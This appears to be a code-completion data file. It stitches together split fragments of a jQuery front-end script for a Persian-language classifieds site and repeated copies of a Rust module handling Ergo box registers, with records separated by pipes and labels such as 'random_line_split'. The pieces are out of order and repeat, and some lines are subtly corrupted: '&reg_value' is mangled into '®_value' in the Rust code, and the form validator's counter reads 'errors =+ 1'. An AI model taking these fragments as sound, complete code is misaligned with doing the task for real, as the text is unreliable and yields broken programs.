$(input).closest('label').children('.errorMessage').remove()
}
var errors = 0
for (var i = 0; i < form.length; i++) {
if ($(form[i]).attr('validate') === 'false') {
errors =+ 1
}
}
if (errors === 0) {
$(form).find('input[type=submit]').prop('disabled', false);
}else {
$(form).find('input[type=submit]').prop('disabled', true);
}
}
// currency field
$('input.currency').click(function(){
$(this).val('')
});
$('input.currency').change(function(){
var val = $(this).val().match(/\d+/)[0].replace(/\B(?=(\d{3})+(?!\d))/g, "٫");
$(this).val(val + ' ریال')
})
//Stats
function stats() {
maxH = "";
$('#stats ul li .visit').each(function(){
$(this).parent().append('<div class="bar"></div>');
if (parseInt($(this).text()) > maxH) {
maxH = parseInt($(this).text())
}
})
$('#stats ul li .visit').each(function(){
h = ((parseInt($(this).text()) / maxH)*100) + '%'
$(this).parent().children('.bar').height(h);
})
$('#stats ul li .bar').each(function(){
$(this).height($(this).height() - 60);
if ( $(this).height() < 1) {
$(this).height(2)
}
})
}
stats();
| aHash | identifier_name |
custom.js | //////////////////////////////////////////////////////////////////////////////////
$(document).ready(function(){
//IE
isIE = /*@cc_on!@*/false || !!document.documentMode;
if (isIE) {
$( 'header, footer, main, aside' ).each(function(){
$(this).replaceWith( '<div class="ie-' + $(this).prop("tagName").toLowerCase() + '">' + $( this ).html() + "</div>" );
})
$('.ie-main').addClass('clearfix')
}
//header
//header - searchbox
$('#headertools button[name=search]').click(function(){
$('input.topbarSearch').focus();
})
$('input.topbarSearch').focus(function(){
$('#headertools button[name=search]').hide();
$('#headertools button[name=close]').show();
$('#topbar .title').hide()
});
$('input.topbarSearch').focusout(function(){
$('#headertools button[name=search]').show();
$('#headertools button[name=close]').hide();
setTimeout(function(){
$('#topbar .title').fadeIn()
},500);
});
// slider
if ($('.slider').length) {
sliderBuild();
sliderRoll(1);
}
//order
changeOrder()
//pop menue
$('.popmenu').not('.popmenu.active').click(function(){
$('.popmenu').removeClass('active');
$(this).addClass('active');
})
$(document).on('click', function (e) {
if ($('.popmenu.active').length && $(e.target).closest('.popmenu.active').length === 0) {
$('.popmenu').removeClass('active');
}
});
// hash links
if (window.location.hash.length) {
setTimeout(function () {
aHash(window.location.hash)
}, 1000);
}else {
setTimeout(function () {
aHash()
}, 1000);
}
$("a[href^=#]").click(function( e ) {
e.preventDefault();
aHash($(this).attr('href'))
})
function aHash(hash) {
if (hash) {
hash = hash
}else{
hash = $('.director a[href^=#]').attr('href')
}
if (hash && hash.length> 1) {
console.log(hash);
$("a[href^=#]").removeClass('active');
$('a[href=' + hash + ']').addClass('active');
window.location.hash = hash;
$('main > *.active').removeClass('active');
var hash = $(hash).get(0)
$(hash).addClass('active');
}
}
//click Effect
$('.cfx').click(function(e){
var elm = $(this);
var width = ($(this).width() * 1.5)
var xPos = Math.floor(e.pageX - elm.offset().left);
var yPos = Math.floor(e.pageY - elm.offset().top);
pob = ~~(Math.random() * 10000)
$(this).append('<div id="bubble' + pob + '" class="bubbleWrap"></div>');
$('#bubble' + pob).append('<div class="bubble"></div>');
$('#bubble' + pob + ' .bubble').css({
'left': xPos - (width / 2),
'top': yPos - (width / 2),
'width': width,
'height': width,
'-webkit-transform' : 'scale(0)',
'-moz-transform' : 'scale(0)',
'-ms-transform' : 'scale(0)',
'-o-transform' : 'scale(0)',
'transform' : 'scale(0)'
})
setTimeout(function () {
$('#bubble' + pob + ' .bubble').addClass('active')
}, 100);
setTimeout(function(){
// $('#bubble' + pob).remove()
},1000)
});
// box scroll fix
$('.scrlfix').bind('mousewheel DOMMouseScroll', function(e) {
var scrollTo = null;
if (e.type == 'mousewheel') {
scrollTo = (e.originalEvent.wheelDelta * -.1);
}
else if (e.type == 'DOMMouseScroll') {
scrollTo = .1 * e.originalEvent.detail;
}
if (scrollTo) {
e.preventDefault();
$(this).scrollTop(scrollTo + $(this).scrollTop());
}
});
//Moble Mode
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
$(document).on('click', '#showmenu', function() {
$("#menu , #hidemenu").addClass("active");
$(this).removeClass("active");
$("#menu").offset({left: 0});
$("nav, #headertools").addClass("menu");
$('#topbar').append('<div id="dimmer"></div>');
$('html').css({'overflow':'hidden'});
$('body').append('<div id="menucover"></div>');
setTimeout(function () {
$('#dimmer').addClass('active');
$('#menucover').addClass('active');
}, 500);
})
$(document).on('click', '#dimmer ', function() {
$("#menu").removeClass("active");
$("#menu").offset({left: -250});
$("nav, #headertools").removeClass("menu");
$('html').css({'overflow':'auto'});
$("#showmenu").addClass("active");
$('#hidemenu').removeClass("active");
$(this).remove();
$('#menucover').remove();
});
$(document).on('click', '#hidemenu ', function() {
$("#dimmer").click();
});
// bazaar page
$('#ads .ad section').click(function(e){
if (e.target.nodeName != 'BUTTON') {
var target = $(this).closest('section').children('a').attr('href')
window.location.href = target
}
});
// bazaar page - filter bar
$('#filterbar button[name=list]').click(function(){
$('#filterbar button[name=grid]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
})
$('#filterbar button[name=grid]').click(function(){
$('#filterbar button[name=list]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
})
$('#filterbar button[name=filters]').click(function(){
$(this).toggleClass('active');
$('#filters').toggleClass('active');
})
$('#filterbar button[name=sort]').click(function(){
$(this).toggleClass('active');
$('#sort').toggleClass('active');
})
$('#sort, #filters').children('button[name=close]').click(function(){
var name = $(this).closest('section').attr('id');
$('#filterbar button[name=' + name + ']').click();
})
//ad page
$('#adGalleryList .thumbnail').click(function(){
$('#adGalleryList .thumbnail').removeClass('active');
$(this).addClass('active');
var src = $(this).attr('imgsrc')
$('#adGallerySelected').css({'background':'url(' + src + ')'})
})
// bookmark button
$('button[name=bookmark]').click(function(){
alert('Bookmark Test')
})
//forms
$('input[name=resetpassword]').click(function(){
$('#password-reset').show()
$(this).hide()
})
// image selectors
$(document).on('change', 'input[type=file]', function() {
if (this.files && this.files[0]) {
var target = '.' + $(this).attr('t')
var reader = new FileReader();
reader.onload = function (e) {
$(target).css({'background': 'url(' + e.target.result + ')'}).show();
};
reader.readAsDataURL(this.files[0]);
}
})
//image add
imgNum = $('.box.pics div').length + 1;
$('input[name=addPicture]').click(function(){
if (imgNum < 5) {
var fieldset = $(this).closest('fieldset').get(0)
var box = $(fieldset).children('.box')
$(fieldset).append('<input type="file" name="adp-' + imgNum + '" accept="image/*" t="adp-' + imgNum + '" >')
$(box).removeClass('hidden').append('<div style="display:none;" class="adp-' + imgNum + '"><i ></i></div>')
$('input[name=adp-' + imgNum + ']').click();
imgNum = imgNum + 1;
}else{
alert('شما حداکثر مجاز به انتخاب چهار تصویر برای هر آگهی هستید!')
}
})
// image remove
$(document).on('click', '.box > div ', function() {
$(this).remove()
$('input[name=' + $(this).attr('class') + ']').remove();
imgNum = imgNum - 1;
$('input[name=addPicture]').prop('disabled', false);
//
var input = $('body input[name^=adp]');
for (var i = 0; i < input.length; i++) {
var element = input[i]
$(element).attr('name', 'adp-' + (i+1)).attr('t' , 'adp-' + (i+1))
}
var image = $('body .box.pics div');
for (var i = 0; i < image.length; i++) {
var element = image[i]
$(element).attr('class' , 'adp-' + (i+1))
}
});
});
//////////////////////////////////////////////////////////////////////////////////
$(window).resize(function(){
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
if ($('.slider').length) {
sliderResize()
}
changeOrder()
});
//////////////////////////////////////////////////////////////////////////////////
menu = false
//Moble mode
function mobileModeStart() {
if (menu !== true && $('body.msg').length < 1) {
mobileMenuBuild();
listHorizontaller()
filterbarMobile()
}
}
function mobileModeEnd() {
if (menu) {
mobileMenuremover();
listVerticaller()
filterbarNormal()
}
}
function mobileMenuBuild() {
$('#headertools').wrap( '<div class="clearfix" id="menu"></div>' );
$('nav, #footersitemap, #footersocials').appendTo('#menu');
$('body').append('<button id="showmenu" title="منو" type="button" class="icon cfx active" name="menu"></button>');
$('body').append('<button id="hidemenu" title="بستن" type="button" class="icon cfx" name="menu"></button>');
menu = true;
}
function mobileMenuremover() {
$('nav, #headertools').unwrap();
$('#showmenu, #hidemenu').remove();
if (isIE) {
$('#footersitemap, #footersocials').appendTo('.ie-footer');
}else {
$('#footersitemap, #footersocials').appendTo('footer');
}
menu = false;
}
function listHorizontaller() {
$('#popularbazaar ul, #newbazaar ul').wrap( '<div class="wrap"></div>' );
$( "#popularbazaar .wrap, #newbazaar .wrap" ).each(function(){
$(this).scrollLeft($(this).children('ul').width())
})
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).width($(this).children('li').length * 155);
})
}
function listVerticaller() {
$( "#popularbazaar ul, #newbazaar ul" ).unwrap()
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).css({'width':'auto'});
})
}
function filterbarMobile() {
$('#filterbar button[name=grid]').removeClass('active');
$('#filterbar button[name=list]').addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
}
function filterbarNormal() {
$('#filterbar button[name=list]').removeClass('active');
$('#filterbar button[name=grid]').addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
}
// slider
function sliderBuild() {
numOfSlides = $('.slides .slide').length
$('.slider').append('<ul class="handle"></ul>')
for (var i = 1; i < numOfSlides + 1; i++) {
$('.slider .handle').append('<li class="sl' + i + '"></li>')
}
$('.slider').append('<div class="slh handle-next">Next</div><div class="slh handle-prev">Prev</div>')
$('.sl1').addClass('active');
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
}
function sliderResize() {
setTimeout(function () {
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
var num = parseInt($('.handle li.active').attr('class').split("sl")[1])
if (num === numOfSlides) {
num = 1
}
clearTimeout(timer);
$('.slider .handle li').removeClass('active');
$('.slider .sl' + num).addClass('active');
sliderRoll(num)
}, 700);
}
function sliderRoll(num) {
var move = (num - 1) * $('.slide')[0].getBoundingClientRect().height
$('.slides').animate({scrollTop : move},'1000')
$('.slider .handle li').removeClass('next').html('');
$('.slider .handle li').removeClass('prev').html('');
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
$('.slider .handle li.sl' + (num - 1)).addClass('prev').html('');
timer = setTimeout(function(){
if (num === numOfSlides) {
num = 0
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
}
$('.slider .sl' + (num + 1)).click()
},10000);
num + 1
} | clearTimeout(timer);
ThisSlide = parseInt($(this).attr('class').split("sl")[1])
$('.slider .handle li').removeClass('active');
$(this).addClass('active');
sliderRoll(ThisSlide)
})
//scroll to element
function scrollToElement(element ,gap) {
if (menu) {
gap = gap + 48
}
var distance = $(element).offset().top - $("html, body").scrollTop() - gap
$("html, body").animate({
scrollTop : distance
},'500');
}
//change order
function changeOrder() {
$('body .order').each(function(){
var cl = $(this).attr('class')
if (window.innerWidth > 961) {
var order = cl[cl.search("o-l-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth > 720 && window.innerWidth < 960) {
var order = cl[cl.search("o-m-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth < 721) {
var order = cl[cl.search("o-s-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
})
}
//form Validator
$('form.validator label *').on('change blur', function(e) {
formValidator(e);
})
function formValidator(e) {
var input = e.currentTarget;
var form = e.currentTarget.form;
var massage = '<span class="errorMessage">پاسخ به این گزینه اجباری است.</span>'
//
for (var i = 0; i < form.length; i++) {
var value = form[i].value;
var required = $(form[i]).prop('required');
var checked = form[i].checked;
var type = form[i].type;
if (required) {
if (['text','email','phone','number','password', 'textarea'].indexOf(type) > -1) {
if (value === '') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['select'].indexOf(type) > -1) {
if (value === '' || value === '---' || value === 'لطفا انتخاب فرمایید') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['checkbox'].indexOf(type) > -1) {
if (!checked) {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
}
}
//
if ($(input).attr('validate') === 'false') {
$(input).closest('label').addClass('error');
if ($(input).closest('label').children('.errorMessage').length < 1) {
$(input).closest('label').append(massage)
}
}
if ($(input).attr('validate') === 'true') {
$(input).closest('label').removeClass('error');
$(input).closest('label').children('.errorMessage').remove()
}
var errors = 0
for (var i = 0; i < form.length; i++) {
if ($(form[i]).attr('validate') === 'false') {
errors =+ 1
}
}
if (errors === 0) {
$(form).find('input[type=submit]').prop('disabled', false);
}else {
$(form).find('input[type=submit]').prop('disabled', true);
}
}
// currency field
$('input.currency').click(function(){
$(this).val('')
});
$('input.currency').change(function(){
var val = $(this).val().match(/\d+/)[0].replace(/\B(?=(\d{3})+(?!\d))/g, "٫");
$(this).val(val + ' ریال')
})
//Stats
function stats() {
maxH = "";
$('#stats ul li .visit').each(function(){
$(this).parent().append('<div class="bar"></div>');
if (parseInt($(this).text()) > maxH) {
maxH = parseInt($(this).text())
}
})
$('#stats ul li .visit').each(function(){
h = ((parseInt($(this).text()) / maxH)*100) + '%'
$(this).parent().children('.bar').height(h);
})
$('#stats ul li .bar').each(function(){
$(this).height($(this).height() - 60);
if ( $(this).height() < 1) {
$(this).height(2)
}
})
}
stats(); | $(document).on('click', '.slider .handle li', function() { | random_line_split |
register.rs | //! Box registers
use crate::mir::constant::Constant;
use crate::mir::expr::Expr;
use crate::serialization::sigma_byte_reader::SigmaByteRead;
use crate::serialization::sigma_byte_writer::SigmaByteWrite;
use crate::serialization::SigmaParsingError;
use crate::serialization::SigmaSerializable;
use crate::serialization::SigmaSerializationError;
use crate::serialization::SigmaSerializeResult;
use ergo_chain_types::Base16EncodedBytes;
use std::convert::TryInto;
use std::{collections::HashMap, convert::TryFrom};
use thiserror::Error;
mod id;
pub use id::*;
mod value;
pub use value::*;
/// Stores non-mandatory registers for the box
#[derive(PartialEq, Eq, Debug, Clone)]
#[cfg_attr(feature = "json", derive(serde::Serialize, serde::Deserialize))]
#[cfg_attr(
feature = "json",
serde(
into = "HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>",
try_from = "HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>"
)
)]
pub struct NonMandatoryRegisters(Vec<RegisterValue>);
impl NonMandatoryRegisters {
/// Maximum number of non-mandatory registers
pub const MAX_SIZE: usize = NonMandatoryRegisterId::NUM_REGS;
/// Empty non-mandatory registers
pub fn empty() -> NonMandatoryRegisters {
NonMandatoryRegisters(vec![])
}
/// Create new from map
pub fn new(
regs: HashMap<NonMandatoryRegisterId, Constant>,
) -> Result<NonMandatoryRegisters, NonMandatoryRegistersError> {
NonMandatoryRegisters::try_from(
regs.into_iter()
.map(|(k, v)| (k, v.into()))
.collect::<HashMap<NonMandatoryRegisterId, RegisterValue>>(),
)
}
/// Size of non-mandatory registers set
pub fn len(&self) -> usize {
self.0.len()
}
/// Return true if non-mandatory registers set is empty
pub fn is_empty(&self) -> bool {
self.0.is_empty()
}
/// Get register value (returns None, if there is no value for the given register id)
pub fn get(&self, reg_id: NonMandatoryRegisterId) -> Option<&RegisterValue> {
self.0.get(reg_id as usize)
}
/// Get register value as a Constant
/// returns None, if there is no value for the given register id or an error if it's an unparseable
pub fn get_constant(
&self,
reg_id: NonMandatoryRegisterId,
) -> Result<Option<Constant>, RegisterValueError> {
match self
.0
.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
{
Some(rv) => match rv.as_constant() {
Ok(c) => Ok(Some(c.clone())),
Err(e) => Err(e),
},
None => Ok(None),
}
}
}
/// Create new from ordered values (first element will be R4, and so on)
impl TryFrom<Vec<RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<RegisterValue>) -> Result<Self, Self::Error> {
if values.len() > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(values.len()))
} else {
Ok(NonMandatoryRegisters(values))
}
}
}
impl TryFrom<Vec<Constant>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<Constant>) -> Result<Self, Self::Error> {
NonMandatoryRegisters::try_from(
values
.into_iter()
.map(RegisterValue::Parsed)
.collect::<Vec<RegisterValue>>(),
)
}
}
impl SigmaSerializable for NonMandatoryRegisters {
fn sigma_serialize<W: SigmaByteWrite>(&self, w: &mut W) -> SigmaSerializeResult {
let regs_num = self.len();
w.put_u8(regs_num as u8)?;
for (idx, reg_value) in self.0.iter().enumerate() {
match reg_value {
RegisterValue::Parsed(c) => c.sigma_serialize(w)?,
RegisterValue::ParsedTupleExpr(t) => t.to_tuple_expr().sigma_serialize(w)?,
RegisterValue::Invalid { bytes, error_msg } => {
let bytes_str = base16::encode_lower(bytes);
return Err(SigmaSerializationError::NotSupported(format!("unparseable register value at {0:?} (parsing error: {error_msg}) cannot be serialized in the stream (writer), because it cannot be parsed later. Register value as base16-encoded bytes: {bytes_str}", NonMandatoryRegisterId::get_by_zero_index(idx))));
}
};
}
Ok(())
}
fn sigma_parse<R: SigmaByteRead>(r: &mut R) -> Result<Self, SigmaParsingError> {
let regs_num = r.get_u8()?;
let mut additional_regs = Vec::with_capacity(regs_num as usize);
for idx in 0..regs_num {
let expr = Expr::sigma_parse(r)?;
let reg_val = match expr {
Expr::Const(c) => RegisterValue::Parsed(c),
Expr::Tuple(t) => {
RegisterValue::ParsedTupleExpr(EvaluatedTuple::new(t).map_err(|e| {
RegisterValueError::UnexpectedRegisterValue(format!(
"error parsing tuple expression from register {0:?}: {e}",
RegisterId::try_from(idx)
))
})?)
}
_ => {
return Err(RegisterValueError::UnexpectedRegisterValue(format!(
"invalid register ({0:?}) value: {expr:?} (expected Constant or Tuple)",
RegisterId::try_from(idx)
))
.into())
}
};
additional_regs.push(reg_val);
}
Ok(additional_regs.try_into()?)
}
}
/// Possible errors when building NonMandatoryRegisters
#[derive(Error, PartialEq, Eq, Clone, Debug)]
pub enum NonMandatoryRegistersError {
/// Set of register has invalid size(maximum [`NonMandatoryRegisters::MAX_SIZE`])
#[error("invalid non-mandatory registers size ({0})")]
InvalidSize(usize),
/// Set of non-mandatory indexes are not densely packed
#[error("registers are not densely packed (register R{0} is missing)")]
NonDenselyPacked(u8),
}
impl From<NonMandatoryRegisters>
for HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>
{
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_value)| {
(
NonMandatoryRegisterId::get_by_zero_index(i),
// no way of returning an error without writing custom JSON serializer
#[allow(clippy::unwrap_used)]
Base16EncodedBytes::new(®_value.sigma_serialize_bytes()),
)
})
.collect()
}
}
impl From<NonMandatoryRegisters> for HashMap<NonMandatoryRegisterId, RegisterValue> {
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_val)| (NonMandatoryRegisterId::get_by_zero_index(i), reg_val))
.collect()
}
}
impl TryFrom<HashMap<NonMandatoryRegisterId, RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(
reg_map: HashMap<NonMandatoryRegisterId, RegisterValue>,
) -> Result<Self, Self::Error> {
let regs_num = reg_map.len();
if regs_num > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(regs_num))
} else {
let mut res: Vec<RegisterValue> = vec![];
NonMandatoryRegisterId::REG_IDS
.iter()
.take(regs_num)
.try_for_each(|reg_id| match reg_map.get(reg_id) {
Some(v) => Ok(res.push(v.clone())),
None => Err(NonMandatoryRegistersError::NonDenselyPacked(*reg_id as u8)),
})?;
Ok(NonMandatoryRegisters(res))
}
} | impl TryFrom<HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>>
for NonMandatoryRegisters
{
type Error = NonMandatoryRegistersError;
fn try_from(
value: HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>,
) -> Result<Self, Self::Error> {
let cm: HashMap<NonMandatoryRegisterId, RegisterValue> =
value.into_iter().map(|(k, v)| (k, v.into())).collect();
NonMandatoryRegisters::try_from(cm)
}
}
impl From<NonMandatoryRegistersError> for SigmaParsingError {
fn from(error: NonMandatoryRegistersError) -> Self {
SigmaParsingError::Misc(error.to_string())
}
}
#[allow(clippy::unwrap_used)]
#[cfg(feature = "arbitrary")]
pub(crate) mod arbitrary {
use super::*;
use proptest::{arbitrary::Arbitrary, collection::vec, prelude::*};
#[derive(Default)]
pub struct ArbNonMandatoryRegistersParams {
pub allow_unparseable: bool,
}
impl Arbitrary for NonMandatoryRegisters {
type Parameters = ArbNonMandatoryRegistersParams;
type Strategy = BoxedStrategy<Self>;
fn arbitrary_with(params: Self::Parameters) -> Self::Strategy {
vec(
if params.allow_unparseable {
prop_oneof![
any::<Constant>().prop_map(RegisterValue::Parsed),
vec(any::<u8>(), 0..100).prop_map({
|bytes| RegisterValue::Invalid {
bytes,
error_msg: "unparseable".to_string(),
}
})
]
.boxed()
} else {
any::<Constant>().prop_map(RegisterValue::Parsed).boxed()
},
0..=NonMandatoryRegisterId::NUM_REGS,
)
.prop_map(|reg_values| NonMandatoryRegisters::try_from(reg_values).unwrap())
.boxed()
}
}
}
#[allow(clippy::panic)]
#[allow(clippy::unwrap_used)]
#[allow(clippy::expect_used)]
#[cfg(test)]
mod tests {
use super::*;
use crate::serialization::sigma_serialize_roundtrip;
use proptest::prelude::*;
proptest! {
#[test]
fn hash_map_roundtrip(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
let regs_from_map = NonMandatoryRegisters::try_from(hash_map);
prop_assert![regs_from_map.is_ok()];
prop_assert_eq![regs_from_map.unwrap(), regs];
}
#[test]
fn get(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
hash_map.keys().try_for_each(|reg_id| {
prop_assert_eq![®s.get_constant(*reg_id).unwrap().unwrap(), hash_map.get(reg_id).unwrap().as_constant().unwrap()];
Ok(())
})?;
}
#[test]
fn reg_id_from_byte(reg_id_byte in 0i8..NonMandatoryRegisterId::END_INDEX as i8) {
assert!(RegisterId::try_from(reg_id_byte).is_ok());
}
#[test]
fn ser_roundtrip(regs in any::<NonMandatoryRegisters>()) {
prop_assert_eq![sigma_serialize_roundtrip(®s), regs];
}
}
#[test]
fn test_empty() {
assert!(NonMandatoryRegisters::empty().is_empty());
}
#[test]
fn test_non_densely_packed_error() {
let mut hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = HashMap::new();
let c: Constant = 1i32.into();
hash_map.insert(NonMandatoryRegisterId::R4, c.clone().into());
// gap, missing R5
hash_map.insert(NonMandatoryRegisterId::R6, c.into());
assert!(NonMandatoryRegisters::try_from(hash_map).is_err());
}
} | }
#[cfg(feature = "json")] | random_line_split |
register.rs | //! Box registers
use crate::mir::constant::Constant;
use crate::mir::expr::Expr;
use crate::serialization::sigma_byte_reader::SigmaByteRead;
use crate::serialization::sigma_byte_writer::SigmaByteWrite;
use crate::serialization::SigmaParsingError;
use crate::serialization::SigmaSerializable;
use crate::serialization::SigmaSerializationError;
use crate::serialization::SigmaSerializeResult;
use ergo_chain_types::Base16EncodedBytes;
use std::convert::TryInto;
use std::{collections::HashMap, convert::TryFrom};
use thiserror::Error;
mod id;
pub use id::*;
mod value;
pub use value::*;
/// Stores non-mandatory registers for the box
#[derive(PartialEq, Eq, Debug, Clone)]
#[cfg_attr(feature = "json", derive(serde::Serialize, serde::Deserialize))]
#[cfg_attr(
feature = "json",
serde(
into = "HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>",
try_from = "HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>"
)
)]
pub struct NonMandatoryRegisters(Vec<RegisterValue>);
impl NonMandatoryRegisters {
/// Maximum number of non-mandatory registers
pub const MAX_SIZE: usize = NonMandatoryRegisterId::NUM_REGS;
/// Empty non-mandatory registers
pub fn empty() -> NonMandatoryRegisters {
NonMandatoryRegisters(vec![])
}
/// Create new from map
pub fn new(
regs: HashMap<NonMandatoryRegisterId, Constant>,
) -> Result<NonMandatoryRegisters, NonMandatoryRegistersError> |
/// Size of non-mandatory registers set
pub fn len(&self) -> usize {
self.0.len()
}
/// Return true if non-mandatory registers set is empty
pub fn is_empty(&self) -> bool {
self.0.is_empty()
}
/// Get register value (returns None, if there is no value for the given register id)
pub fn get(&self, reg_id: NonMandatoryRegisterId) -> Option<&RegisterValue> {
self.0.get(reg_id as usize)
}
/// Get register value as a Constant
/// returns None, if there is no value for the given register id or an error if it's an unparseable
pub fn get_constant(
&self,
reg_id: NonMandatoryRegisterId,
) -> Result<Option<Constant>, RegisterValueError> {
match self
.0
.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
{
Some(rv) => match rv.as_constant() {
Ok(c) => Ok(Some(c.clone())),
Err(e) => Err(e),
},
None => Ok(None),
}
}
}
/// Create new from ordered values (first element will be R4, and so on)
impl TryFrom<Vec<RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<RegisterValue>) -> Result<Self, Self::Error> {
if values.len() > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(values.len()))
} else {
Ok(NonMandatoryRegisters(values))
}
}
}
impl TryFrom<Vec<Constant>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<Constant>) -> Result<Self, Self::Error> {
NonMandatoryRegisters::try_from(
values
.into_iter()
.map(RegisterValue::Parsed)
.collect::<Vec<RegisterValue>>(),
)
}
}
impl SigmaSerializable for NonMandatoryRegisters {
fn sigma_serialize<W: SigmaByteWrite>(&self, w: &mut W) -> SigmaSerializeResult {
let regs_num = self.len();
w.put_u8(regs_num as u8)?;
for (idx, reg_value) in self.0.iter().enumerate() {
match reg_value {
RegisterValue::Parsed(c) => c.sigma_serialize(w)?,
RegisterValue::ParsedTupleExpr(t) => t.to_tuple_expr().sigma_serialize(w)?,
RegisterValue::Invalid { bytes, error_msg } => {
let bytes_str = base16::encode_lower(bytes);
return Err(SigmaSerializationError::NotSupported(format!("unparseable register value at {0:?} (parsing error: {error_msg}) cannot be serialized in the stream (writer), because it cannot be parsed later. Register value as base16-encoded bytes: {bytes_str}", NonMandatoryRegisterId::get_by_zero_index(idx))));
}
};
}
Ok(())
}
fn sigma_parse<R: SigmaByteRead>(r: &mut R) -> Result<Self, SigmaParsingError> {
let regs_num = r.get_u8()?;
let mut additional_regs = Vec::with_capacity(regs_num as usize);
for idx in 0..regs_num {
let expr = Expr::sigma_parse(r)?;
let reg_val = match expr {
Expr::Const(c) => RegisterValue::Parsed(c),
Expr::Tuple(t) => {
RegisterValue::ParsedTupleExpr(EvaluatedTuple::new(t).map_err(|e| {
RegisterValueError::UnexpectedRegisterValue(format!(
"error parsing tuple expression from register {0:?}: {e}",
RegisterId::try_from(idx)
))
})?)
}
_ => {
return Err(RegisterValueError::UnexpectedRegisterValue(format!(
"invalid register ({0:?}) value: {expr:?} (expected Constant or Tuple)",
RegisterId::try_from(idx)
))
.into())
}
};
additional_regs.push(reg_val);
}
Ok(additional_regs.try_into()?)
}
}
/// Possible errors when building NonMandatoryRegisters
#[derive(Error, PartialEq, Eq, Clone, Debug)]
pub enum NonMandatoryRegistersError {
/// Set of register has invalid size(maximum [`NonMandatoryRegisters::MAX_SIZE`])
#[error("invalid non-mandatory registers size ({0})")]
InvalidSize(usize),
/// Set of non-mandatory indexes are not densely packed
#[error("registers are not densely packed (register R{0} is missing)")]
NonDenselyPacked(u8),
}
impl From<NonMandatoryRegisters>
for HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>
{
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_value)| {
(
NonMandatoryRegisterId::get_by_zero_index(i),
// no way of returning an error without writing custom JSON serializer
#[allow(clippy::unwrap_used)]
Base16EncodedBytes::new(®_value.sigma_serialize_bytes()),
)
})
.collect()
}
}
impl From<NonMandatoryRegisters> for HashMap<NonMandatoryRegisterId, RegisterValue> {
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_val)| (NonMandatoryRegisterId::get_by_zero_index(i), reg_val))
.collect()
}
}
impl TryFrom<HashMap<NonMandatoryRegisterId, RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(
reg_map: HashMap<NonMandatoryRegisterId, RegisterValue>,
) -> Result<Self, Self::Error> {
let regs_num = reg_map.len();
if regs_num > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(regs_num))
} else {
let mut res: Vec<RegisterValue> = vec![];
NonMandatoryRegisterId::REG_IDS
.iter()
.take(regs_num)
.try_for_each(|reg_id| match reg_map.get(reg_id) {
Some(v) => Ok(res.push(v.clone())),
None => Err(NonMandatoryRegistersError::NonDenselyPacked(*reg_id as u8)),
})?;
Ok(NonMandatoryRegisters(res))
}
}
}
#[cfg(feature = "json")]
impl TryFrom<HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>>
for NonMandatoryRegisters
{
